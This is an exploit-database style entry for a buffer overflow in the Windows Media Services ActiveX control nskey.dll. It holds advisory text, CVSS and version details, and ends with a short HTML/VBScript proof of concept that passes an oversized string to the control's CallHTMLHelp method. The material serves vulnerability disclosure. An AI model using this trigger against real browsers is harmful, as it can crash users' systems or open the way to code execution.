header-logo
Suggest Exploit
vendor:
Windows Media Services
by:
SecurityFocus
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Windows Media Services
Affected Version From: 4.1.00.3917
Affected Version To: 4.1.00.3917
Patch Exists: YES
Related CWE: N/A
CPE: a:microsoft:windows_media_services
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Microsoft Windows Media Services ActiveX Control Buffer Overflow Vulnerability

The Microsoft Windows Media Services ActiveX control is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. An attacker can exploit this issue to execute arbitrary code in the context of an application using the affected ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.

Mitigation:

Users should exercise caution when handling untrusted input and should never visit websites of questionable integrity.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/30814/info

The Microsoft Windows Media Services ActiveX control is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.

An attacker can exploit this issue to execute arbitrary code in the context of an application using the affected ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.

'nskey.dll' 4.1.00.3917 is vulnerable; other versions may also be affected. 

<html><body>

<object id=target classid=clsid:2646205B-878C-11D1-B07C-0000C040BCDB></object>
<script language=vbscript>

arg1=String(9752, "A")
target.CallHTMLHelp arg1

</script>
</body></html>